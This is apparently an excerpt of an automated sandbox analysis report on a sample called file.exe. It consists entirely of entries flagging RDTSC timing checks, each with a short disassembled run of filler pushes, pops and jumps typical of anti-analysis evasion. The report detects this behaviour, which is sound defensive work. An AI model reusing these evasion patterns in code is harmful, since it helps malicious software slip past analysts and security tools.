            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5739DA second address: 573A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F45D50449B9h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572825 second address: 57282A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57282A second address: 57282F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57282F second address: 57283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jo 00007F45D5047A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572AE8 second address: 572AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5731A8 second address: 5731C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578FDD second address: 578FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578FE1 second address: 578FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3771 second address: 4F3775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E740 second address: 57E744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D270 second address: 57D28F instructions: 0x00000000 rdtsc 0x00000002 js 00007F45D50449C1h 0x00000008 jmp 00007F45D50449B5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D3A7 second address: 57D3C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F45D5047A30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D3C0 second address: 57D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D83F second address: 57D843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D843 second address: 57D84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D9DD second address: 57D9E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0E3 second address: 57E0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0E9 second address: 57E0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0EF second address: 57E168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F45D50449A6h 0x00000009 jmp 00007F45D50449ACh 0x0000000e pop eax 0x0000000f jmp 00007F45D50449B7h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 jbe 00007F45D50449A6h 0x0000001e pop ecx 0x0000001f jmp 00007F45D50449B5h 0x00000024 pushad 0x00000025 jno 00007F45D50449A6h 0x0000002b jmp 00007F45D50449AFh 0x00000030 jne 00007F45D50449A6h 0x00000036 popad 0x00000037 pushad 0x00000038 jmp 00007F45D50449ACh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E168 second address: 57E16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5814CB second address: 5814CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58165F second address: 581691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A37h 0x00000007 jmp 00007F45D5047A34h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58181E second address: 58186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F45D50449B6h 0x0000000d jmp 00007F45D50449B0h 0x00000012 jne 00007F45D50449D3h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58186E second address: 581873 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E2E second address: 583E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ACh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E3E second address: 583E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E44 second address: 583E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E4E second address: 583E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E54 second address: 583E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E58 second address: 583E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F45D5047A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583AD1 second address: 583AF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jno 00007F45D50449A6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 je 00007F45D50449A6h 0x0000001c jp 00007F45D50449A6h 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583AF4 second address: 583B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583B04 second address: 583B1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583B1B second address: 583B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45D5047A2Fh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5884AE second address: 5884B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5884B4 second address: 5884C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jns 00007F45D5047A26h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588179 second address: 588193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588193 second address: 5881A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F45D5047A26h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5881A1 second address: 5881B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B63 second address: 589B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B6A second address: 589B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B71 second address: 589BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A34h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d ja 00007F45D5047A26h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F45D5047A2Ch 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D787 second address: 58D79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D79F second address: 58D7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A35h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jp 00007F45D5047A26h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC77 second address: 58CC7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC7D second address: 58CC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC83 second address: 58CC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDC0 second address: 58CDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDC4 second address: 58CDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D061 second address: 58D06F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F45D5047A2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D22C second address: 58D234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D234 second address: 58D239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D239 second address: 58D23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D23F second address: 58D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D3A3 second address: 58D3A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D3A8 second address: 58D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593054 second address: 593068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449AFh 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593068 second address: 593093 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45D5047A28h 0x00000008 pushad 0x00000009 jnc 00007F45D5047A26h 0x0000000f jmp 00007F45D5047A38h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F4E second address: 591F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F58 second address: 591F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 jnc 00007F45D5047A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jnp 00007F45D5047A26h 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F82 second address: 591F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F86 second address: 591F92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F45D5047A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5920D5 second address: 5920DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5920DA second address: 5920F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F45D5047A26h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F45D5047A28h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592246 second address: 59226A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F45D50449B5h 0x0000000c jl 00007F45D50449A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59226A second address: 59226F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59226F second address: 592282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449AFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592282 second address: 592290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F45D5047A26h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592290 second address: 592294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592294 second address: 5922BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45D5047A37h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592D57 second address: 592D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jp 00007F45D50449A6h 0x00000013 pop edx 0x00000014 jmp 00007F45D50449B7h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592D82 second address: 592D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595481 second address: 59548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F45D50449A6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B23C second address: 59B247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F45D5047A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B4F2 second address: 59B4FC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B4FC second address: 59B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD1D second address: 59BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C039 second address: 59C07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 ja 00007F45D5047A3Ch 0x0000000c jmp 00007F45D5047A30h 0x00000011 jl 00007F45D5047A26h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F45D5047A37h 0x0000001f je 00007F45D5047A26h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4862 second address: 5A486C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A486C second address: 5A487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D5047A2Dh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A392A second address: 5A392E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A392E second address: 5A394D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45D5047A37h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3A9C second address: 5A3AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3AB2 second address: 5A3ABC instructions: 0x00000000 rdtsc 0x00000002 js 00007F45D5047A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3C01 second address: 5A3C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3D53 second address: 5A3D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3ED7 second address: 5A3EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3EDB second address: 5A3EF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F45D5047A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F45D5047A2Fh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4034 second address: 5A4068 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45D50449A6h 0x00000008 jmp 00007F45D50449B9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F45D50449B1h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4068 second address: 5A4071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A41F9 second address: 5A420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jns 00007F45D50449AEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A437C second address: 5A4396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F45D5047A35h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4396 second address: 5A43A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A454E second address: 5A4553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4553 second address: 5A455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE12 second address: 5ACE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F45D5047A26h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB156 second address: 5AB161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB566 second address: 5AB56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB56A second address: 5AB576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB86D second address: 5AB873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABE16 second address: 5ABE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D50449B2h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACC87 second address: 5ACCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45D5047A26h 0x0000000a pop ecx 0x0000000b jmp 00007F45D5047A2Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
